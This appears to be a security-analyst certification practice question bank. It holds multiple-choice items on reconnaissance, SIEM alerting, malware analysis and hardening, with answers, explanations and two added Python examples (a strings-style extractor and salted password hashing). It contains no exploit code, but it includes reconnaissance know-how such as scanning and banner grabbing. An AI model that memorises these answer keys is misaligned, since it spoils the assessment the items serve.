C. To show current NetBIOS sessions and their status, Alex can issue the nbtstat -s command. The -c flag shows the NetBIOS name cache, while the -r command displays the count of NetBIOS names resolved through a WINS server query and by broadcast. There is no -o flag.
69. While conducting reconnaissance of his own organization, Chris discovers that multiple certificates are self-signed. What issue should he report to his management? A. Self-signed certificates do not provide secure encryption for site visitors. B. Self-signed certificates can be revoked only by the original creator. C. Self-signed certificates will cause warnings or error messages. D. None of the above
C. Using self-signed certificates for services that will be used by the general public or organizational users outside of a small testing group can be an issue because they will result in an error or warning in most browsers. The TLS encryption used for HTTPS will remain just as strong regardless of whether the certificate is provided by a certificate authority or self-signed, and a self-signed certificate cannot be revoked at all!
80. While conducting reconnaissance, Greg discovers what he believes is an SMTP service running on an alternate port. What technique should he use to manually validate his guess? A. Send an email via the open port. B. Send an SMTP probe. C. telnet to the port. D. ssh to the port.
C. Using telnet to connect to remote services to validate their response is a useful technique for service validation. It doesn't always work but can allow you to interact with the service to gather information manually.
42. Lucca wants to prevent workstations on his network from attacking each other. If Lucca's corporate network looks like the network shown here, what technology should he select to prevent laptop A from being able to attack workstation B? IMAGE HERE A. An IPS B. An IDS C. A HIPS D. A HIDS
C. When endpoints are connected without a network control point between them, a host-based solution is required. In this case, Lucca's specific requirement is to prevent attacks, rather than simply detect them, meaning that a HIPS is required to meet his needs. Many modern products combine HIPS capabilities with other features such as data loss prevention and system compliance profiling, so Lucca may end up with additional useful capabilities if he selects a product with those features.
38. Lucy is the SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently. After her discovery in the first part of this question, Lucy is tasked with configuring alerts that are sent to system administrators. She builds a rule that can be represented in pseudocode as follows: Send an SMS alert every 30 seconds when systems do not send logs for more than 1 minute. The average administrator at Lucy's organization is responsible for 150 to 300 machines. What danger does Lucy's alert create? A. A DDoS that causes administrators to not be able to access systems B. A network outage C. Administrators may ignore or filter the alerts. D. A memory spike
C. When faced with massive numbers of notification messages that are sent too aggressively, administrators are likely to ignore or filter the alerts. Once they do, they are unlikely to respond to actual issues, causing all of the advantages of monitoring to be lost. If she doesn't spend some time identifying reasonable notification thresholds and frequencies, Lucy's next conversation is likely to be with an angry system administrator or manager.
46. Laura's organization has been receiving a large amount of spam email sent specifically to the email addresses listed in her organization's domain registrations. Which of the following techniques will help her organization limit this type of spam? A. DNS query rate limiting B. CAPTCHAs C. Using a proxy service D. Blacklisting
C. While spam to a registrant's email address may seem trivial, it may mean that important messages related to the domain are missed. The best way to limit this is to use a privacy or proxy service to register the domain. Many, if not most, popular registration services offer a privacy service, sometimes at an extra charge. Unfortunately, if a domain was previously registered before privacy services or proxies are used, that information can be looked up and used.
75. Adam's port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. If Adam needs to guess what type of device this is based on these ports, what is his best guess? A. A web server B. An FTP server C. A printer D. A proxy server
C. While the first three ports are common to many of the devices listed, TCP 515 is the LPR/LPD port, 631 is the IPP port commonly used by many print servers, and TCP 9100 is the RAW, or direct, IP printing port. While this could be another type of device, it is most likely a network-connected printer.
35. As part of her malware analysis process, Caitlyn diagrams the high-level functions and processes that the malware uses to accomplish its goals. What is this process known as? A. Static analysis B. Composition C. Dynamic analysis D. Decomposition
D. Caitlyn is preparing a decomposition diagram that maps the high-level functions to lower-level components. This will allow her to better understand how the malware package works and may help her identify areas she should focus on.
76. Cassandra believes that attackers were able to extract a volume shadow copy of a workstation belonging to her organization's Windows domain administrator. What information should she not report as being potentially exposed? A. All files on the user's desktop B. Password hashes C. Domain details D. Plain-text Windows account passwords
D. Cassandra should report that password hashes, user files, and domain details may have been exposed. Windows does not store plain-text Windows account passwords, so this should not be a concern unless the administrator keeps them in a file!
60. Charles wants to detect port scans using syslog so that he can collect and report on the information using his SIEM. If he is using a default CentOS system, what should he do? A. Search for use of privileged ports in sequential order. B. Search for connections to ports in the /var/syslog directory. C. Log all kernel messages to detect scans. D. Install additional tools that can detect scans and send the logs to syslog
D. Detecting port scans requires the ability to identify scanning behavior, and the applications that create syslog entries on most default Linux distributions are not set up for this. Charles should identify a tool like psad, an IDS package, or other tool that can track connections and scan behavior and report on it and then use syslog to send those messages to his log collector or SIEM.
66. Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services including telnet, FTP, and web servers. What is his best option to secure these systems? A. Enable host firewalls. B. Install patches for those services. C. Turn off the services for each appliance. D. Place a network firewall between the devices and the rest of the network.
D. Geoff's only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often don't have patches available, and many appliances do not allow the services they provide to be disabled or modified.
39. Lucy is the SOC operator for her organization and is responsible for monitoring her organization's SIEM and other security devices. Her organization has both domestic and international sites, and many of their employees travel frequently. Lucy configures an alert that detects when users who do not typically travel log in from other countries. What type of analysis is this? A. Trend B. Availability C. Heuristic D. Behavior
D. Lucy has configured a behavior-based detection. It is likely that a reasonable percentage of the detections will be for legitimate travel for users who typically do not leave the country, but pairing this behavioral detection with other behavioral or anomaly detections can help determine whether the login is legitimate.
63. While reviewing the filesystem of a potentially compromised system, Angela sees the following output when running ls -la. What should her next action be after seeing this? IMAGE HERE A. Continue to search for other changes. B. Run diff against the password file. C. Immediately change her password. D. Check the passwd binary against a known good version
D. The passwd binary stands out as having recently changed. This may be innocuous, but if Angela believes the machine was compromised, there is a good chance the passwd binary has been replaced with a malicious version. She should check the binary against a known good version and then follow her incident response process if it doesn't match.
62. Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on. IMAGE HERE A. 508 B. 617 C. 846 D. 714
D. The service running from the www directory as the user apache should be an immediate indication of something strange, and the use of webmin from that directory should also be a strong indicator of something wrong. Lucas should focus on the web server for the point of entry to the system and should review any files that the Apache user has created or modified. If local vulnerabilities existed when this compromise occurred, the attacker may have already escalated to another account!
56. Ben wants to quickly check a suspect binary file for signs of its purpose or other information that it may contain. What Linux tool can quickly show him potentially useful information contained in the file? A. grep B. more C. less D. strings
D. The strings command extracts runs of printable characters from files, allowing Ben to quickly get a sense of a file's contents. Grep would require knowing what he is looking for, and either the more or less command will simply display the file, which is not a useful strategy for binaries.
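What strings actually does is simple enough to reimplement, which makes its limits clear: it reports any run of at least four printable ASCII bytes, with no understanding of file format. The following added example (not from the book and not the GNU strings source) does that in Python over a constructed byte string standing in for a suspect binary; the sample contents and the URL in it are invented.

```python
import re
from typing import Dict, List, Tuple

# Constructed stand-in for a binary: an ELF-like header, padding, and two embedded strings.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 8
    + b"/bin/sh\x00" + b"\x01\x02"
    + b"http://example.invalid/update\x00" + b"ab\x00"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[Tuple[int, str]]:
    """Return (offset, text) for each run of printable ASCII (0x20-0x7e or tab)
    at least min_len bytes long, mirroring the default behaviour of strings -t d."""
    pattern = re.compile(rb"[\x20-\x7e\t]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def interesting(hits: List[Tuple[int, str]]) -> Dict[str, List[str]]:
    """Bucket extracted strings by the kinds an analyst usually looks at first."""
    buckets: Dict[str, List[str]] = {"urls": [], "paths": [], "other": []}
    for _, text in hits:
        if text.startswith(("http://", "https://")):
            buckets["urls"].append(text)
        elif text.startswith("/"):
            buckets["paths"].append(text)
        else:
            buckets["other"].append(text)
    return buckets


if __name__ == "__main__":
    hits = extract_strings(SAMPLE_BINARY)
    for offset, text in hits:
        print(f"{offset:8d} {text}")
    print(interesting(hits))
```

The "ELF" magic and the trailing "ab" are dropped because they fall under the four-character minimum, which is also why short or obfuscated strings in real samples are missed and why strings is a first look rather than a verdict.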
72. Geoff needs to lock down a Windows workstation that has recently been scanned using nmap with the results shown here. He knows that the workstation needs to access websites and that the system is part of a Windows domain. What ports should he allow through the system's firewall for externally initiated connections? IMAGE HERE A. 80, 135, 139, and 445 B. 80, 445, and 3389 C. 135, 139, and 445 D. No ports should be open.
D. The uses described for the workstation that Geoff is securing do not require inbound access to the system on any of these ports. Web browsing and Active Directory domain membership traffic can be handled by traffic initiated by the system.
33. As a member of a blue team, John observed the following behavior during an external penetration test. What should he report to his managers at the conclusion of the test. IMAGE HERE A. A significant increase in latency B. A significant increase in packet loss C. Latency and packet loss both increased. D. No significant issues were observed.
D. This chart shows typical latency for a remote system and minimal or at times zero packet loss. This chart shows normal operations, and John can safely report no visible issues.
88. During an on-site penetration test of a small business, Bob scans outward to a known host to determine the outbound network topology. What information can he gather from the results provided by Zenmap? IMAGE HERE A. There are two nodes on the local network. B. There is a firewall at IP address 96.120.24.121. C. There is an IDS at IP address 96.120.24.121. D. He should scan the 10.0.2.0/24 network.
D. This scan shows Bob that he is likely on a network using some portion of the 10.0.0.0/8 private IP space. An initial scan of the 10.0.2.0/24 network to determine what is near him would be a good start. Since the Zenmap scan was run to a single external host, it will not show other hosts on the local network, so there may be more than two nodes on the network. Bob cannot make determinations about what the host at 96.120.24.121 is, beyond a device on the route between the local host and his remote scan destination.
78. Jarett needs to protect an application server against resource exhaustion attacks. Which of the following techniques is best suited to surviving a large-scale DDoS attack? A. Enable application sharding. B. Review each query and implement query optimization. C. Implement aggressive aging at the organization's firewall. D. Employ a CDN.
D. While application sharding and query optimization can help services respond under heavy loads, Jarett's best bet is to work with a content delivery network (CDN) that has built-in DDoS mitigation. A CDN keeps his content reachable from its edge caches even if the origin is taken offline and spreads the load across many servers during an attack, even when the CDN's anti-DDoS capabilities cannot entirely absorb it. Aggressive aging (expiring idle connection-table entries sooner) can help a firewall survive connection floods and may improve survivability somewhat, but it does nothing about a large-scale volumetric attack that saturates the link in front of the firewall.
31. While gathering reconnaissance data for a penetration test, Charleen uses the MxToolbox MX Lookup tool. What can she determine from the response to her query shown here? IMAGE HERE A. The mail servers are blacklisted. B. The mail servers have failed an SMTP test. C. The mail servers are clustered. D. There are two MX hosts listed in DNS.
D. While the hostnames cluster1 and cluster1a indicate that there may be a cluster of mail servers, this query does not prove that. Instead, Charleen knows that there are two MX entries for her target. She will also notice that mail hosting is handled by messagelabs, a software-as-a-service provider for email and other managed services, indicating that the public email presence for her target is handled by a specialized company. MXToolbox allows deeper queries about blacklists and SMTP tests, but this image only shows the links to them and does not provide details.
8. Charles wants to provide additional security for his web application that currently stores passwords in plain text in a database. Which of the following options is his best option to prevent theft of the database from resulting in exposed passwords? A. Encrypt the database of plain-text passwords. B. Use MD5 and a salt. C. Use SHA-1 and a salt. D. Use bcrypt.
D. bcrypt is a purpose-built password hashing algorithm: it is deliberately slow, carries a tunable work factor, and generates and stores a per-password salt. If Charles uses bcrypt, he has made the best choice on the list. MD5 and SHA-1 are fast general-purpose hashes, so even with a salt an attacker with commodity GPUs can test billions of guesses per second against a stolen table. Encrypting the database may seem like a good idea, but the application must decrypt it to use it, so an exploit that reads the database through the application (or steals the key along with the data) still yields plain-text passwords.
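As an added example that is not part of the book, the pattern bcrypt implements, written in Python with the standard library's PBKDF2-HMAC-SHA256 so it runs without third-party packages: a random per-password salt, a cost parameter stored alongside the hash so it can be raised later, a constant-time comparison, and a `needs_rehash` check for migrating old records. With the `bcrypt` package the same shape is `bcrypt.hashpw(pw, bcrypt.gensalt(rounds=12))` and `bcrypt.checkpw`; bcrypt (or scrypt/Argon2) should be preferred in production over PBKDF2. The storage format string and iteration count below are this example's own choices, not the book's.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # cost parameter; raise it as hardware gets faster
SALT_BYTES = 16


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode("ascii")


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt>$<digest>' (example format)."""
    salt = os.urandom(SALT_BYTES)           # fresh salt per password, never reused
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${_b64(salt)}${_b64(digest)}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost; compare in constant time."""
    try:
        algo, iterations, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(actual, expected)   # avoids a timing side channel


def needs_rehash(stored: str, minimum: int = ITERATIONS) -> bool:
    """True if a record was hashed with a lower cost than current policy."""
    return int(stored.split("$")[1]) < minimum


def unsalted_md5(password: str) -> str:
    """The 'before' case: identical passwords collide and a rainbow table breaks them all."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print("login ok:", verify_password("correct horse battery staple", record))
    print("same MD5 for two users:", unsalted_md5("hunter2") == unsalted_md5("hunter2"))
```

The rehash check is the operational piece that is easy to forget: verify the password with the stored cost, and if `needs_rehash` is true, re-hash with the current cost while the plain-text password is in hand at login.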
23. Isaac wants to grab the banner from a remote web server using commonly available tools. Which of the following tools cannot be used to grab the banner from the remote host? A. netcat B. telnet C. wget D. ftp
D. netcat, telnet, and wget can all be used for Isaac's banner-grabbing exercise: netcat and telnet open a raw TCP connection over which he can type an HTTP request by hand, and wget (with -S or --server-response) shows the Server header. The ftp client expects to speak FTP as soon as it connects, so pointing it at a web server's port will not return the HTTP banner he wants to see.
20. During a network reconnaissance exercise, Chris gains access to a PC located in a secure network. If Chris wants to locate database and web servers that the company uses, what command-line tool can he use to gather information about other systems on the local network without installing additional tools or sending additional traffic? A. ping B. traceroute C. nmap D. netstat
D. netstat is found on Windows, Linux, and macOS systems. It lists the host's listening ports and its active and recent connections, including the remote addresses and ports of systems the host has talked to, and it does so without sending any traffic, since it only reports the local socket table. Chris can look for connections to common web and database service ports (80, 443, 1433, 3306, 5432, 1521) to identify the local targets he is looking for. ping and traceroute generate traffic, and nmap is rarely installed by default.
29. After Kristen received a copy of an nmap scan run by a penetration tester that her company hired, she knows that the tester used the -O flag. What type of information should she expect to see included in the output other than open ports? A. OCMP status B. Other ports C. Objective port assessment data in verbose mode D. Operating system and Common Platform Enumeration (CPE) data
D. With the -O flag, nmap attempts OS fingerprinting and reports its guess along with Common Platform Enumeration (CPE) identifiers for the detected operating system; verbose output (-v) adds detail about the match. If Kristen had seen the -sV flag instead, she would have expected service version information.